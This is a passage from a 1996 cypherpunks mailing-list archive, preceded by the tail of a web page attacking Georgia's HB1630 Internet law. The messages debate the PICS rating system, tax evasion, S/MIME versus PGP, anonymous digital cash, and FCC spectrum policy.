     company wrote attorney Jeff Kuester a letter saying Parsons does not
     serve as a lobbyist--and that the actual lobbyists were "totally
     unaware" of the company's suit against the Real InterNet Pages. The
     letter said, "Bell South did not draft, sponsor, promote or lobby
     for 1630. Bell South took no position on the legislation whatsoever
     other than, when it was brought to our attention, to recommend an
     exemption from liability for telephone companies and Internet access
     providers who provide transmission services for their customers."
     BellSouth did say that "it is probably probably overkill and unduly
     complicating to make the act of trademark infringement,
     misrepresentation and passing off on the Internet a crime under
     state law." The company also offered observations on the law's
     effects on links--thoughts with which the Electronic Frontier
     Foundation would undoubtedly disagree.
     
     [IMAGE] The Prize-winning Web Page of Jeff Kuester, the Net-hip
     intellectual property attorney mentioned earlier, who also has an
     engineering background and is active in groups such as IEEE. You can
     bet that like Kuester, scads of other Georgians love the Net and are
     just as surprised and disappointed by the Internet Police law as the
     rest of us were. He has a page with relevant links about the law.
     Kuester (kuester@kuesterlaw.com) is working to bring state pols up
     to speed on Net law and technology, and he would like to expand his
     efforts at the national level. Send him a note if you're interested
     in helping out. A good cause! Note, too, the existence of a
     Congressional Internet Caucus. Education of policymakers is the best
     protection against Net-stupid legislation like HB1630. Perhaps even
     Parsons will see the light someday. Meanwhile, if you want to check
     out some first-class resources on the Net and intellectual property
     law, drop on by Kuester's site!
     
     [IMAGE] The Real InterNet Pages, the Net directory that the
     $18-billion BellSouth conglomerate is suing for alleged trademark
     infringement. BellSouth holds a trademark on the phrase "The Real
     Yellow Pages," but does that automatically entitle the company to
     "realpages.com" on the Net? Read why a BellSouth triumph could hurt
     you. The boys at realpages.com have put together a nice Web page
     with a yellow background ("we don't think they own the color yellow
     either"). E-mail your support to Don Madey at dmadey@realpages.com.
     Any lawyers out there willing to do pro bono? Publicity from such a
     case could be an excellent career-enhancer.
     
     [IMAGE] c|net News Article on the Police Law.
     
     [IMAGE] Georgia Cyberphobes, the Augusta Chronicle's editorial
     against the Net police bill--written just before Gov. Miller signed
     it. The Chronicle didn't see the HR1630's trademark-related
     language as a threat but objected to the attack on online anonymity.
     It called for Miller to vero the bill.
     
     [IMAGE] Editor and Publisher. He explains how links help
     electronic newspapers. Note: The just-supplied link will soon
     disappear, but when that happens, you might be able to find the
     column in his archives.
     
      Return to Top of Page
      
      [IMAGE]
      
YOUR OWN "NIGHT THE LIGHTS WENT OUT" PARODY? I'M LOOKING FOR THE RIGHT ONE

     
       _______________________________________________________________
     
     
     
     Who can come up with the best "Night the Lights Went Out in
     Georgia" parody-in the spirit of this site?
     
     Give it a shot. May 18 is the contest deadline, and I may extend
     it if Netfolks are too angry to concentrate long enough come up with
     a quotable parody. No prizes, just some exquisite notoriety.
     
     Please do not enter, of course, if you mind having scads of other
     Web sites link to your words.
     
     -David H. Rothman, rothman@clark.net
     
     
       _______________________________________________________________
     
      Top of Page | Return to NetWorld!
      
      [IMAGE]
      
     
     
     Linking Encouraged. No Permission Needed from Me, Especially
     if You're in Georgia!
     
   


 \   \   \   \   \   \   \   \   \   |   /   /   /   /   /   /   /   /   /   /
          _______       ________          _____        _____  _____
         ///   \\\      |||   \\\        /// \\\       |||\\\///|||
        |||     ~~      |||   ///       |||   |||      ||| \\// |||
        |||     __      |||~~~\\\       |||~~~|||      |||  ~~  |||
         \\\   ///      |||    \\\      |||   |||      |||      |||
          ~~~~~~~       ~~~     ~~~     ~~~   ~~~      ~~~      ~~~
 /   /   /   /   /   /   /   /   /   |   \   \   \   \   \   \   \   \   \   \

C y b e r s p a t i a l  R e a l i t y  A d v a n c e m e n t  M o v e m e n t


--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 7 May 1996 14:24:34 +0800
To: "Vladimir Z. Nuri" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: misunderstandings of PICS
Message-ID: <199605062215.PAA07291@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:48 PM 5/6/96 -0700, Vladimir Z. Nuri wrote:
>please read the PICS proposal (sorry the
>URL is not handy, could someone post it?)

  http://www.w3.org/pub/WWW/PICS/


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 7 May 1996 14:19:06 +0800
To: "E. ALLEN SMITH" <vznuri@netcom.com
Subject: Re: misunderstandings of PICS
Message-ID: <199605062224.PAA08149@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  4:40 PM 5/6/96 -0400, E. ALLEN SMITH wrote:
>From:   IN%"frantz@netcom.com" 16-APR-1996 20:19:13.88
>>From http://www.w3.org/pub/WWW/PICS/iacwc.htm
>>The second method is for a client to ask an http server to send labels along
>>with the documents it requests. The server would most likely offer the
>>publishers' labels, but a server could also redistribute labels from third
>>parties that it cooperates with. [Client sends URL of label service to browser
>>which responds with that service's label.  bf]

OBCRYPTO: PICS envisions that ratings distributed by this second method
will be digitally signed by the 3rd party rating service.



------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 7 May 1996 07:22:16 +0800
To: cypherpunks@toad.com
Subject: OCT_pus
Message-ID: <199605061526.PAA03975@pipe1.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   5-6-96. Time:

   "Master of the Game. The formidable John Deutch is becoming
   the most powerful CIA chief ever."

      This power didn't fall accidentally into Deutch's lap;
      he has lobbied hard for it. While he mouthed
      technocratic demurrals before the Senate committee,
      promising not to be too "intrusive" and humbly noting
      that "my Cabinet colleagues have concerns about how
      future DCI's would, over the long term, play a role in
      this concurrence," it was clearly time for the winner to
      take all.

      The CIA is already upgrading many of its techniques:
      breaking into computer systems, intercepting faxes,
      experimenting with dead drops in cyberspace to receive
      secrets.

      The big-ticket spending that is out of control has been
      satellites. The CIA wants to build $1 billion-apiece
      "8X" spy satellites to photograph targets, even though
      it has sitting in warehouses about half a dozen
      satellites that have the capacity to take pictures for
      the next decade. But satellites may simply not be that
      useful. A secret CIA study recently concluded that
      satellites provide less than 10% of the valuable signal
      intelligence collected from such rogue states as Iraq
      and Iran. Most such data are scooped up by ground
      stations or via phone taps.

      There is deep anxiety at Langley that Deutch's grab for
      power is designed to advance his own career.

   OCT_pus

-----

William Safire adds to this in 5-6-96 NYT: www.nytimes.com.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 11:43:18 +0800
To: cypherpunks@toad.com
Subject: Police tactics question
Message-ID: <01I4E2S0NTES8Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I've often heard of the police/postmaster mailing someone child
pornography prior to going in and busting them for possession of it. What are
the legal matters in such cases?
	Thanks,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vit <vitamin@best.com>
Date: Tue, 7 May 1996 14:13:20 +0800
To: hfinney@shell.portal.com
Subject: No Subject
Message-ID: <199605062154.OAA10770@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


::
Encrypted: PGP

-----BEGIN PGP MESSAGE-----
Version: 2.6.3

hEwDKlkQ745WINUBAfsH7B6NGAXK+c8CX1dS/KhyQqmQL9p8ooDnz0RiY+E62khg
gIJAZ9HZSG+BGnJ6xebCKJU7zSMM8B/WzfYzzo3hpgAAAgPUxGgzy3fxGdV/vaFI
CwkkWsrDP50PPQCkVWrLg33Pp3yDl92/QPnVwQBtTWLHq5LC2RdFsVzk657VVriN
qXFhWwWgFlk6RWK4WDDj/fwUSzWQy5OojW9vQmUvyS0u416Y/DbpNDy4TGs+UC0G
cGWcOEtTiBtSMG+qLIWCh7PDkmscf6Ze3Gy+zhTrjZ0PixZ9yRsTbMYwcqo5Gd/O
c9x9E6Zf+vlNINzY2kbFt7Xbk0tbyjVFXFX4FKe6R2Ee6pvpRdDFmBYca2sfmSr/
imTrhmzpu/FrVOGB+L/VT7A2t6NzDyNitOHu70uxaeQaettNkSa63ObUbK1G8Toc
6jYGv4d7GvtXL50a+P5oFq+3qGgTeHX99Pz6M9SgCBXWbCFA4J0TEBN6CD4MVgZE
qJFOqoA/zAg6l0YHOZFnyXiEcUqnd1o8AyHzRQGoVnTbmnlTof0zkqHzHgYGU8Qd
HAi2Ev+usDUCzbHwAncA4moOM4bHQcT14vv6RZWTcrt3eA4ad9vsr8YlEkbM3Rjd
6S0HGBWsjRPopdfGaCFT1EDmHDm9uDjq7WqbH8/76CwFeEQNU7j9milBo4LKe/xh
uUN8jq6oQVl5jBgxhK481pNxutXJWYjEv1+YdT1enKPG7A9PUtYlNGlrWcQqJiqs
r7a8rnxDF4/7cSjZLEybdEgd4k+mSA==
=kMl/
-----END PGP MESSAGE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 13:42:22 +0800
To: stewarts@ix.netcom.com
Subject: Re: A MODEST PROPOSAL (fwd)
Message-ID: <01I4E2XUW8RC8Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"stewarts@ix.netcom.com"  "Bill Stewart"  5-MAY-1996 03:53:29.33

>I think that's user-settable, but there is no ideal approach.

	I certainly hope it's user-settable, and settable by each mailing
list.

>The big advantage is that replies go to the original sender by default 
>rather than to the list (which reduces the amount of personal mail going
>to the list, winning both on noise-reduction and embarassment-reduction);

	That's what I suspected the reason was. Sort of like having mail
instead of post as a default in USENET.

>the disadvantage is that bouncemail goes to the original sender, rather
>than the list or the list-manager (bouncemail to the sender is annoying, 
>but minor; bouncemail to the list is extremely annoying, as well as 
>potentially causing mail loops, which are an extreme lossage.  Bouncemail
>to the list-manager is ideal (not that the list-manager usually reads it),
>but it's hard to get without reducing replies directly to originators,
>as well as increasing replies accidentally going to the list-manager.

	I've been looking into procmail as a mail filtering mechanism for a
list. It appears possible to handle at least some of the bouncemail via
sending it to the list-manager (looking for things like priority:
list/bulk/junk, for instance). Any further suggestions?
	Incidentally, I've been having problems locating the list-manager
guides for majordomo; yes, I've tried Alta Vista. All I seem to be able to
locate are A. the guides for users - not much use; and B. the FAQ. Sameer?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 7 May 1996 07:18:11 +0800
To: cypherpunks@toad.com
Subject: IRI_spy
Message-ID: <199605061549.PAA06043@pipe1.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   5-6-96. WaPo reports on ID by iris scanning and other
   biometrics spying by NSA and the 200-member Biometrics
   Consortium.

   The consortium's espionage site:

      http://www.vitro.bloomington.in.us:8080/~BC/


   IRI_spy






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 11:42:27 +0800
To: frissell@panix.com
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <01I4E307ZW1Q8Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frissell@panix.com"  "Duncan Frissell"  5-MAY-1996 08:56:32.33

>Even though the population of those who regularly violate federal tax laws
>is smaller (20 million?) the records show that even for this population the
>odds of being convicted are approximately the odds of being nurdered.

	However, are you controlling for level of income? The IRS is a lot
more worried about TCMay committing tax fraud than they are about me committing
tax fraud; my income taxes are a lot closer to 0 than his.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 7 May 1996 06:51:38 +0800
To: cypherpunks@toad.com
Subject: ATF_ear
Message-ID: <199605061549.PAA06105@pipe1.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   5-6-96. WaPo reports on ATF and LEAs being ostracized by
   benign feds and citizens fearful of being housed with them.

   ATF_ear







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 12:07:49 +0800
To: jk@stallion.ee
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <01I4E344DD6S8Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jk@stallion.ee"  "=?ISO-8859-1?Q?J=FCri_Kaljundi?="  5-MAY-1996 11:47:15.29

>Here in Estonia there was a proposal made in the parliament to remove
>taxation on corporate income (right now there is a proportional corporate
>income tax of 26%), which should bring more foreign investments into
>Estonia and also make Estonian economy develop faster. Estonia I think is
>one of few countries where there is a possibility of accepting this kind
>of law. Of course European countries, USA and different international
>financial organisations are very against this kind of law. This law would 
>apply both to companies and to self-employed private persons (farmers for
>example).

	Let me guess the reason for the objection... it would make siting
an offshore-type company in Estonia to avoid taxes possible.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 7 May 1996 15:41:36 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: misunderstandings of PICS
In-Reply-To: <01I4E4S4ZWSE8Y583T@mbcl.rutgers.edu>
Message-ID: <199605062253.PAA15378@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


EAS:

now that you quote the PICS standard instead of CyberAngels
in referring to PICS, I think we are getting somewhere.

>... PICS specifies three ways to distribute labels. The first is to embed
>labels in HTML documents. This method will be helpful for those who wish to
>label content they have created. 

right. as I said, I think this will be the less important area of the
PICS proposal. in fact, I think it is a bit misleading to say, "the first 
is..", because the other methods are really what PICS was trying to achieve,
in my opinion (this is just my perception, I don't know if the writer
would agree. these kinds of issues are still being worked out).

one useful idea related to "self-rating" 
is to allow the user to create a sort of "abstract" or
"keywords" that could be incorporated into the rating system. such
an idea is not prohibited by the existing proposal and in fact fits
into it nicely imho.

but again, I believe that the "self-rating" concept of PICS 

1) is not the key design goal of PICS, and 

2) will not be a major use of the service in the long run 
in comparison to "rating services", and 

3) because it requires action on the part of the page designer,
it is less desirable for this reason, and in fact another major
aspect of PICS insists that no action on the part of the page 
designer should be possible (that which is relative to URLS)

4) the designers intended that self-rating be voluntary. hence
any coercion of requiring people embed certain kinds of labels
is wholly rejected by the proposal. 

but OK, I see that the CyberAngels have focused on a part of the
PICS proposal that can be twisted into their own unique interpretation.
I see you/they have a semi-valid concept here. frankly, it only suggests
to me how dangerous the "self-rating" concept is, and perhaps that
it should be downplayed in the PICS proposal imho. (any PICS designers
out there listening?)

>In other words, the CyberAngels want to eliminate any pages that
>contain material they think minors shouldn't see that aren't self-rated with
>a PICS self-rating (the first of the three types) intended to block minors
>from seeing it.

this is only how a bonehead would view cyberspace. it's an old view
of how information should be regulated. it's taking the metaphor,
"records should have a little sticky sticker that tells whether
it has explicit content". for someone who think that cyberspace is
made out of atoms, not bits, it seems eminently sensible. but it
is wholly ridiculous and unnecessary.

the cyberangels should clarify
their position. who decides what is rated what? it is amazing how
many people who are favor of some kind of censorship scheme evade the
issue of SUBJECTIVITY, as if a government organization can precisely
determine what is acceptable to children.

it reminds of how those in law enforcement talk about CRIMINALS when
often they are actually referring to SUSPECTS. the distinction is
absolutely critical in civilized society. imagine what effect a
politician's speech would be if he said, "we have to CRACK DOWN
ON CRIMINALS!!!" vs. "we have to CRACK DOWN ON ALL THE CRIME SUSPECTS!!"
I highly recommend that everyone make this mental substitution whenever
you hear someone ranting about "criminals" and see what a different
tone their words take!!

> Yes, this is an abuse of the market oriented variety of PICS;
>they obviously don't know and/or don't care. If you want to convince them
>otherwise, start cc:ing your messages (and forwarding mine, on this I give you
>permission) on PICS and the CyberAngels to angels@wavenet.com.

it's impossible to fully get rid of ignorance. all that can be done
is for proposals to be written as clearly as possible.

since you are so interested and brought it up, I think you ought to
do it. I am doing all that I care to do in posting to this group. you
have given me reason to write on the issue.

>Incidentally, their pressure (especially the legal variety - acting as
>informants) could also include against an ISP that doesn't do the second for
>material the CyberAngels don't like.

right. again, that's why I think the "self-rating" idea should be
minimized in the PICS proposal as the last one listed, and the market-oriented
ones listed first.

I also would like to see terminology that the proposal is expressly
against mandatory kinds of practices such as requiring page writers
to include certain tags based on some agency's opinion etc.

it seems so ridiculous at times that people are on such different
wavelengths that the proposals have to reject all this
explicitly, but of course that's the same idea behind the Bill of Rights.

I do hope the CyberAngels seize on the other aspects of PICS that would
effectively let them put CyberAngel stickers on every single page in
cyberspace, if they have the attention span to actually pull this off.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 7 May 1996 14:18:25 +0800
To: "E. ALLEN SMITH" <unicorn@schloss.li
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <m0uGZBv-00091sC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:44 PM 5/6/96 EDT, E. ALLEN SMITH wrote:

>
>On Sun, 28 Apr 1996, jim bell wrote:
>
>[...]
>
>>While strong cryptography is powerful, and secure communications
>>liberating, unplugging the phones would about cripple that 'weapon' for a
>>while.  Any group rebelling based only on high technology communication is
>>an extremely vulnerable group, both to widespread denial of service, and
>>more specific 'surgical' attacks.  (Motorola stock anyone?)
>
>	Wouldn't that partially depend on:
>		A. the level of backups - packet radio as a backup for phones,
>for instance... a reason I've been forwarding the stuff on radio to here.
>		B. the necessity to the government of keeping what else may
>depend on those phones - the economy - going.
>	-Allen


The attribution above is in error.  I didn't type those lines above.Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 14:04:37 +0800
To: raph@cs.berkeley.edu
Subject: Re: PGP, Inc.
Message-ID: <01I4E39N3LA28Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"raph@cs.berkeley.edu"  "Raph Levien"  5-MAY-1996 13:47:16.83

>   "Observers say SMIME's capabilities will let it replace software
>   based on the PGP code, which is widely used. Unlike SMIME, which uses
>   a structured certificate heirarchy, PGP relies on pre-certification
>   of clients and servers for authentication, a limitation SMIME doesn't
>   face."

	Can one use a web-of-trust for S/MIME, for the cases when a structured
hierarchy is exactly the _wrong_ thing to use? I'd think so, but I don't know
anything about it.

>   Thus, it's a reasonable guess that almost all S/MIME messages that
>pass through the wires will offer "virtually no protection," to quote a
>phrase from a paper co-authored by the principal designer of S/MIME's
>encryption algorithms
>(http://www.bsa.org/policy/encryption/cryptographers.html).

	A public breaking of some S/MIME messages would work to discourage
this unsafe mechanism. One wonders if PGP Inc. could sponsor some variety of
contest?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 12:09:05 +0800
To: jamesd@echeque.com
Subject: Re:  Kid Gloves or Megaphones
Message-ID: <01I4E3EH7JHS8Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jamesd@echeque.com"  5-MAY-1996 14:18:14.34

>>From: Lucky Green
>>>It is true that the issuer is unable to discover that double blinding is
>>>being used. The real problem with the protocol is that it requires
>>>payor/payee collusion, which may make it difficult to execute.

>At 07:58 PM 5/4/96 EDT, E. ALLEN SMITH wrote:
>>	Can the payee discover that the payor isn't colluding before the bank
>>can figure out who the payee is?

>If the payor is not colluding, then the payee will immediately discover
>he has not been paid, because the checksums are wrong, and his software
>says "bad payment"

>If the payor is colluding, then no matter what he reveals to the bank,
>the bank cannot discover the payee.  Note that with payee anonymity,
>the payee does not have to promptly check in his money, so the bank
>has no hope of narrowing the search by coincidence in time.

>But if the payee is colluding, then the payor can be detected by 
>coincidence in time.

	The other messages on this appear to be saying about the same thing,
with the exception of this last part. _Except_ for that, the payor/payee
collusion part doesn't appear to be a problem on the anonymnity side of
things. I would guess that Lucky Green's comment was then that there was an
additional complexity for payor and payee.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 7 May 1996 11:33:31 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <2.2.32.19960506200557.00730d48@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:49 PM 5/6/96 EDT, E. ALLEN SMITH wrote:
>From:	IN%"frissell@panix.com"  "Duncan Frissell"  5-MAY-1996 08:56:32.33
>
>>Even though the population of those who regularly violate federal tax laws
>>is smaller (20 million?) the records show that even for this population the
>>odds of being convicted are approximately the odds of being murdered.
>
>	However, are you controlling for level of income? The IRS is a lot
>more worried about TCMay committing tax fraud than they are about me committing
>tax fraud; my income taxes are a lot closer to 0 than his.
>	-Allen
>

Actually, as a percentage of income, tax evasion is probably more prevalent
among the poor than the rich.  Because they are less exposed.  Studies of
spending show that the poorest 20% of Americans spend twice their reported
income.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 12:07:15 +0800
To: attila@primenet.com
Subject: Re: Why Leahy is No Friend of Ours
Message-ID: <01I4E3O2J8068Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"attila@primenet.com"  "attila"  5-MAY-1996 21:36:54.93

>        how many _truly_ "populist" presidents have we elected? 

	Given the numbers of times that a democracy has done more harm than
good to civil liberties (Prohibition, the election of Islamic Fundamentalists
in Algeria, etcetera), we don't _want_ a "populist"/demagogue president. We
want someone in charge (to whatever degree that someone has to be in charge)
who will respect civil liberties. The masses aren't going to elect such a
person; they prefer protection to liberty and always will.

>           "They that give up essential liberty to obtain a little 
>               temporary safety deserve neither liberty nor safety."
>                        --Ben Franklin (Historical Review of PA -1759)
>
>    and, the bottom line is:
>
>              "It is not the function of our Government to keep the citizen
>                  from falling into error; 
>               it is the function of the citizen to keep the Government 
>                  from falling into error."
>                             --Robert H. Jackson (1892-1954), U.S. Judge

	Quite.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 13:58:31 +0800
To: cypherpunks@toad.com
Subject: More on spectrum allocation
Message-ID: <01I4E3Q7ZPT88Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I'm not sure how much our emphasis on individuals will go along with
Phil Agre's (and CPSR's, of which he's a prominent member) emphasis on
communities.
	-Allen

From:	IN%"rre@weber.ucsd.edu" 30-APR-1996 01:47:55.85
From: Phil Agre <pagre@weber.ucsd.edu>

[The Apple proposal to the FCC is an important initiative for community
networking, and may set a precedent for much more dramatic restructuring
of telecommunications infrastructure in the future.]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Fri, 26 Apr 1996 16:24:44 -0400
From: Heather Boyles <heather@farnet.org>
To: Multiple recipients of list <cni-announce@cni.org>
Subject: FARNET's Washington Update

FARNET's Washington Update --- April 26, 1996

IN THIS ISSUE:

o  1996 Appropriations stalemate finally ends while FY97 appropriations
round heats up

o  FCC proposes free spectrum for community networking

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^^

1996 APPROPRIATIONS STALEMATE FINALLY ENDS WHILE FY97 APPROPRIATIONS ROUND
HEATS UP

After months of negotiations and two partial government shutdowns, the
President and the Republican Congress finally came to agreement this week
on an omnibus spending bill for the remaining five months of FY96.  The
bill includes appropriations for the NSF and Commerce among several other
agencies.  At the same time, authorization and appropriations bills are
being worked through committees in the House for FY97 which begins on Oct.
1.

The final FY96 budget for NSF came to $3.22B --- $40M above what the House
and Senate had previously agreed upon this year.   However, this week also
saw the House Science Committee authorize NSF spending for FY97 at only
$3.25B, a $75M cut from NSF's $3.325 request, which would give NSF less
than a 1% raise over FY96.

NSF has generally faired well amidst Republican (specifically House Science
Committee Chair Robert Walker (PA)) efforts to cut science spending for all
but what they define as "basic science."  Democrats protested that the
omnibus science authorization bill passed out of the committee this week
was done too hastily, bypassing subcommittees for a one-day full committee
session.  Ranking Science Committee member George Brown (D-CA) complained
that, among other things, "The Republican bill would eliminate the Social
Science directorate....[and make] arbitrary personnel cuts at the National
Science Foundation."

The Commerce Department's TIIAP (Information Infrastructure Grants) program
scraped by with an (anticipated) $21.5M for FY96.


FCC PROPOSES FREE SPECTRUM FOR COMMUNITY NETWORKING

Apple's NII Band petition which was filed almost a year ago at the FCC will
finally see some action there.  The FCC today released a Notice of Proposed
Rulemaking that proposes to make 350 megahertz of spectrum available for
use by unlicensed equipment termed "NII/SUPERNet" devices.  The Commission
voted 4-0 to release the proposal.  The proposal comes after Apple Computer
petitioned the FCC last year to create a "NII Band" that would permit
high-speed data communications available to anyone without licensing or
air-time charges.

The FCC's NPRM would make spectrum from 5.25-5.35 GHz and 5.725-5.875 GHz
available to devices that would fall under Part 15 of FCC rules, mandating
only minimum technical standards and a basic "listen-before-talk" protocol
standard.  The FCC would also place power and out-of-band emissions limits
on the devices, thus allowing only short-range (probably indoor or within
campus) networking.

The Apple petition last year advocated allowing users to use the devices
for long-range (community-based with particularly emphasis on rural areas)
communications.  A rival group called the WINForum (made up of a number of
telecommunications companies) balked at the idea of long-range use of the
spectrum (which might cut into their businesses).  Apple's long-range
proposal may not be dead yet though.  Commissioner Ness, in a separate
statement on the NPRM, said she was "intrigued by the Apple long-haul
proposal, which contemplates low-cost broadband links from homes to schools
and libraries," but pointed to a number of questions that would need to be
resolved before the Commission could proceed with such a proposal.

The FCC clearly sees this proposal as an effort to help fulfill the
President's promise to connect every school in the country to the
"information superhighway."  The NII/SUPERNet proposal is aimed at helping
schools and other institutions do that without having to go to the expense
of wiring entire buildings.  Furthermore, the proposal may help take the
wind out of the sails of those who have recently been pressuring the FCC to
include inside wiring of schools in the universal service mechanism for
schools and libraries - the Snowe-Rockefeller-Kerry provisions from the new
telecom law.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Written from FARNET's Washington office,  "FARNET's Washington Update" is a
service to FARNET members and other interested subscribers.  We gratefully
acknowledge EDUCOM's NTTF and the Coalition for Networked Information for
additional support.  If you would like more information about the Update or
would like to offer comments or suggestions, please contact Heather Boyles
at heather@farnet.org.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
Heather Boyles
Director, Policy and Special Projects         phone:  (202) 331-5342
FARNET, Inc.                                              fax:    (202)
872-4318
1112 16th Street, NW   Suite 600              email:  heather@farnet.org
Washington, DC 20036                               web:  http://www.farnet.org






--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 12:05:14 +0800
To: frissell@panix.com
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <01I4E43Y5Z5S8Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frissell@panix.com"  "Duncan Frissell"  6-MAY-1996 16:04:24.96

>Actually, as a percentage of income, tax evasion is probably more prevalent
>among the poor than the rich.  Because they are less exposed.  Studies of
>spending show that the poorest 20% of Americans spend twice their reported
>income.

	Quite. The poor can get away with this for multiple reasons, including
being on more of a cash-based economy. But the largest reason is probably
that the IRS doesn't care nearly as much about each individual at the low
end of the income ladder as they do about any evasion involving a lot of money.
Now, the low end tax evasion probably costs the government a lot more than
the rich does... but it's also a lot harder to pursue.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
